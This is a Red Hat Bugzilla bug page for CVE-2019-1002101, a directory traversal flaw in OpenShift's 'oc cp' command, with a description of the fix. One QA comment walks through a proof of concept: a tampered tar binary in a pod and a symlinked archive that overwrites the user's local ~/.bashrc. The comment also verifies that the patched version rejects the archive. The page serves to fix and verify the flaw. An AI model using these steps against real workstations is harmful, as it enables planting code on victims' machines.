Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 1693315 - CVE-2019-1002101 - oc/kubectl fix potential directory traversal
Summary: CVE-2019-1002101 - oc/kubectl fix potential directory traversal
Alias: None
Product: OpenShift Container Platform
Classification: Red Hat
Component: Command Line Interface
Version: 3.11.0
Hardware: Unspecified
OS: Unspecified
Target Milestone: ---
: 3.11.z
Assignee: Maciej Szulik
QA Contact: Xingxing Xia
Depends On: 1693313
Blocks: 1693318 1693320
TreeView+ depends on / blocked
Reported: 2019-03-27 14:18 UTC by Maciej Szulik
Modified: 2019-04-11 10:50 UTC (History)
4 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Cause: oc cp command was not checking links from tarred files being used to copy files between pod and user's workstation. Consequence: oc cp command could enable a directory traversal replacing or deleting files on a user’s workstation. Fix: Do not allow escaping links or any other files from destination directory. Result: oc cp command verifies files being copied between pods and user workstation not to allow escaping from passed directories.
Clone Of: 1693313
: 1693318 (view as bug list)
Last Closed:
Target Upstream Version:

Attachments (Terms of Use)

Comment 3 Xingxing Xia 2019-04-11 10:50:18 UTC
First, prepare email's PoC data:
$ oc project kube-service-catalog
$ oc get po
apiserver-j4pzm            1/1     Running   0          2h

$ oc rsh apiserver-j4pzm mkdir /evil
$ oc cp pwn.tar apiserver-j4pzm:/evil # see bug 1693313 attachment
$ oc rsh apiserver-j4pzm
sh-4.2# # compromised pod
sh-4.2# cd /evil
sh-4.2# cat > tarbad << EOF
cat /evil/pwn.tar
sh-4.2# chmod a+x tarbad

sh-4.2# tar -tvf pwn.tar
drwxr-xr-x root/root         0 2019-02-18 14:30 ./baddir/
lrwxrwxrwx root/root         0 2019-02-18 12:45 ./baddir/twist -> /proc/self/cwd
-rw-r--r-- root/root        17 2019-02-18 14:30 ./baddir/twist/.bashrc
sh-4.2# cd /tmp
sh-4.2# tar xvf /evil/pwn.tar
tar: ./baddir/twist/.bashrc: Cannot open: Not a directory
tar: Exiting with failure status due to previous errors
sh-4.2# tar xvf /evil/pwn.tar ./baddir/twist/.bashrc
sh-4.2# mv baddir/twist ./
sh-4.2# mv /bin/tar /bin/tar.bak
sh-4.2# cp /evil/tarbad /bin/tar

Then in your local terminal, reproduce the email PoC with old oc 3.11.92:
$ cd ~/ # Here cd ~/ to demo the PoC
$ /path/to/3.11.92/oc cp apiserver-j4pzm:/tmp/twist twist
$ ls twist
$ bash
$ cat ~/.bashrc
echo "***pwn***" <-- this means your local ~/.bashrc is compromised!

Then verify with fixed oc 3.11.104:
$ cd ~/ # Here cd ~/ to demo the PoC
$ /path/to/3.11.104/oc cp apiserver-j4pzm:/tmp/twist twist
error: tar contents corrupted

Note You need to log in before you can comment on or make changes to this bug.